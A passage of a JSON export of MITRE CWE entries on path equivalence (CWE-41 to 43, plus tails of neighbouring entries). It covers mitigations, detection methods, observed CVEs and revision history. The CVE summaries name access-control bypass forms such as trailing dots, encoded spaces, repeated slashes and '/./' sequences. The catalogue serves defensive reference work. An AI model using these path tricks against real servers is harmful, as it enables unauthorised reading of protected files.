does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2001-0687","Description":"FTP server allows a remote attacker to retrieve privileged web server system information by specifying arbitrary paths in the UNC format (\\\\\\\\computername\\\\sharename).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'\\\\\\\\UNC\\\\share\\\\name\\\\\' (Windows UNC share)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;Filelike Objects&#34;, Page 664"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Windows UNC Share - \'\\\\\\\\UNC\\\\share\\\\name\\\\\'","attr":{"@_Date":"2008-04-11"}}}},"41":{"attr":{"@_ID":"41","@_Name":"Improper Resolution of Path Equivalence","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The system or application is vulnerable to file system contents disclosure through path equivalence. Path equivalence involves the use of special characters in file and directory names. The associated manipulations are intended to generate multiple names for the same object.","Extended_Description":"Path equivalence is usually employed in order to circumvent access controls expressed using an incomplete set of file name or file path representations. This is different from path traversal, wherein the manipulations are performed to generate a name for a different object.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Files or Directories","Modify Files or Directories","Bypass Protection Mechanism"],"Note":"An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism than an attacker may be able to bypass the mechanism."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1114","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1114"},{"Reference":"CVE-2002-1986","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1986"},{"Reference":"CVE-2004-2213","Description":"Source code disclosure using trailing dot or trailing encoding space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213"},{"Reference":"CVE-2005-3293","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293"},{"Reference":"CVE-2004-0061","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0061"},{"Reference":"CVE-2000-1133","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1133"},{"Reference":"CVE-2001-1386","Description":"Bypass check for \\".lnk\\" extension using \\".lnk.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"},{"Reference":"CVE-2001-0693","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693"},{"Reference":"CVE-2001-0778","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778"},{"Reference":"CVE-2001-1248","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1248"},{"Reference":"CVE-2004-0280","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280"},{"Reference":"CVE-2005-0622","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0622"},{"Reference":"CVE-2005-1656","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1656"},{"Reference":"CVE-2002-1603","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1603"},{"Reference":"CVE-2001-0054","Description":"Multi-Factor Vulnerability (MVF). directory traversal and other issues in FTP server using Web encodings such as \\"%20\\"; certain manipulations have unusual side effects.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0054"},{"Reference":"CVE-2002-1451","Description":"Trailing space (\\"+\\" in query string) leads to source code disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1451"},{"Reference":"CVE-2000-0293","Description":"Filenames with spaces allow arbitrary file deletion when the product does not properly quote them; some overlap with path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293"},{"Reference":"CVE-2001-1567","Description":"\\"+\\" characters in query string converted to spaces before sensitive file/extension (internal space), leading to bypass of access restrictions to the file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1567"},{"Reference":"CVE-2002-0253","Description":"Overlaps infoleak","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0253"},{"Reference":"CVE-2001-0446","Description":"Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0446"},{"Reference":"CVE-2004-0334","Description":"Bypass Basic Authentication for files using trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0334"},{"Reference":"CVE-2001-0893","Description":"Read sensitive files with trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0893"},{"Reference":"CVE-2001-0892","Description":"Web server allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0892"},{"Reference":"CVE-2004-1814","Description":"Directory traversal vulnerability in server allows remote attackers to read protected files via .. (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1814"},{"Reference":"BID:3518","Description":"Source code disclosure","Link":"http://www.securityfocus.com/bid/3518"},{"Reference":"CVE-2002-1483","Description":"Read files with full pathname using multiple internal slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-1999-1456","Description":"Server allows remote attackers to read arbitrary files via a GET request with more than one leading / (slash) character in the filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1456"},{"Reference":"CVE-2004-0578","Description":"Server allows remote attackers to read arbitrary files via leading slash (//) characters in a URL request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0578"},{"Reference":"CVE-2002-0275","Description":"Server allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0275"},{"Reference":"CVE-2004-1032","Description":"Product allows local users to delete arbitrary files or create arbitrary empty files via a target filename with a large number of leading slash (/) characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1032"},{"Reference":"CVE-2002-1238","Description":"Server allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1238"},{"Reference":"CVE-2004-1878","Description":"Product allows remote attackers to bypass authentication, obtain sensitive information, or gain access via a direct request to admin/user.pl preceded by // (double leading slash).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1878"},{"Reference":"CVE-2005-1365","Description":"Server allows remote attackers to execute arbitrary commands via a URL with multiple leading \\"/\\" (slash) characters and \\"..\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1365"},{"Reference":"CVE-2000-1050","Description":"Access directory using multiple leading slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1050"},{"Reference":"CVE-2001-1072","Description":"Bypass access restrictions via multiple leading slash, which causes a regular expression to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072"},{"Reference":"CVE-2004-0235","Description":"Archive extracts to arbitrary files using multiple leading slash in filenames in the archive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0235"},{"Reference":"CVE-2002-1078","Description":"Directory listings in web server using multiple trailing slash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1078"},{"Reference":"CVE-2004-0847","Description":"ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) \\"\\\\\\" (backslash) or (2) \\"%5C\\" (encoded backslash), aka \\"Path Validation Vulnerability.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"},{"Reference":"CVE-2000-0004","Description":"Server allows remote attackers to read source code for executable files by inserting a . (dot) into the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0004"},{"Reference":"CVE-2002-0304","Description":"Server allows remote attackers to read password-protected files via a /./ in the HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0304"},{"Reference":"BID:6042","Description":"Input Validation error","Link":"http://www.securityfocus.com/bid/6042"},{"Reference":"CVE-1999-1083","Description":"Possibly (could be a cleansing error)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1083"},{"Reference":"CVE-2004-0815","Description":"\\"/./////etc\\" cleansed to \\".///etc\\" then \\"/etc\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815"},{"Reference":"CVE-2002-0112","Description":"Server allows remote attackers to view password protected files via /./ in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0112"},{"Reference":"CVE-2004-0696","Description":"List directories using desired path and \\"*\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0696"},{"Reference":"CVE-2002-0433","Description":"List files in web server using \\"*.ext\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2001-1152","Description":"Proxy allows remote attackers to bypass denylist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1152"},{"Reference":"CVE-2000-0191","Description":"application check access for restricted URL before canonicalization","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2005-1366","Description":"CGI source disclosure using \\"dirname/../cgi-bin\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1366"},{"Reference":"CVE-1999-0012","Description":"Multiple web servers allow restriction bypass using 8.3 names instead of long names","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0012"},{"Reference":"CVE-2001-0795","Description":"Source code disclosure using 8.3 file name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795"},{"Reference":"CVE-2005-0471","Description":"Multi-Factor Vulnerability. Product generates temporary filenames using long filenames, which become predictable in 8.3 format.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0471"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Path Equivalence"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO02-C","Entry_Name":"Canonicalize path names originating from untrusted sources"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"3"}}},"Notes":{"Note":{"#text":"Some of these manipulations could be effective in path traversal issues, too.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Path Equivalence","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Path Equivalence","attr":{"@_Date":"2009-05-27"}}]}},"42":{"attr":{"@_ID":"42","@_Name":"Path Equivalence: \'filename.\' (Trailing Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing dot (\'filedir.\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1114","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1114"},{"Reference":"CVE-2002-1986","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1986"},{"Reference":"CVE-2004-2213","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213"},{"Reference":"CVE-2005-3293","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293"},{"Reference":"CVE-2004-0061","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0061"},{"Reference":"CVE-2000-1133","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1133"},{"Reference":"CVE-2001-1386","Description":"Bypass check for \\".lnk\\" extension using \\".lnk.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Trailing Dot - \'filedir.\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Dot - \'filedir.\'","attr":{"@_Date":"2008-04-11"}}}},"43":{"attr":{"@_ID":"43","@_Name":"Path Equivalence: \'filename....\' (Multiple Trailing Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple trailing dot (\'filedir....\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"42","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"163","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"BUGTRAQ:20040205","Description":"Apache + Resin Reveals JSP Source Code ...","Link":"http://marc.info/?l=bugtraq&amp;m=107605633904122&amp;w=2"},{"Reference":"CVE-2004-0281","Description":"Multiple trailing dot allows directory listing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0281"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Trailing Dot - \'filedir....\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Trailing Dot - \'filedir....\'","attr":{"@_Date":"2008-04-11"}}}},"44":{"attr":{"@_ID":"44","@_Name":"Path 